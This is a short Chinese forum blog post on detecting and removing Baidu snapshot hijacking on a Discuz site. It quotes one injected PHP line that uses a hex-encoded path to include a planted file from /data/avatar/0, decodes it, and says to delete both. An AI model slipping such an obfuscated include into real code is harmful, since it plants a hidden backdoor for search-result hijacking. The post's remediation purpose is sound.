注册 登录
曲靖论坛 返回首页

薄荷的个人空间 https://0874bbs.com/?1 [收藏] [复制] [分享] [RSS]

日志

discuz百度快照劫持排查处理办法

已有 4292 次阅读2023-2-8 13:11 |个人分类:建站笔记

在百度搜索快照中,发现discuz搜索结果出现很多违法信息,
在discuz后台站长工具进行文件检验,在php文件中(尤其注意文件)出现@include($_SERVER['DOCUMENT_ROOT']类似代码
比如:
@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30')
对字符串:2F646174612F6176617461722F30进行解密,
通过16进制文本字符串在线转化,解密后为:/data/avatar/0
意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。
解决办法:删除上面的代码和文件即可

路过
鸡蛋
鲜花
握手
雷人
收藏 分享邀请 举报

全部作者的其他最新日志

评论 (0 个评论)

facelist doodle 涂鸦板

您需要登录后才可以评论 登录 | 注册

侵权举报:本页面所涉内容为用户发表并上传,相应的法律责任由用户自行承担;本网站仅提供存储服务;如存在侵权问题,请权利人与本网站联系删除!联系QQ:47833653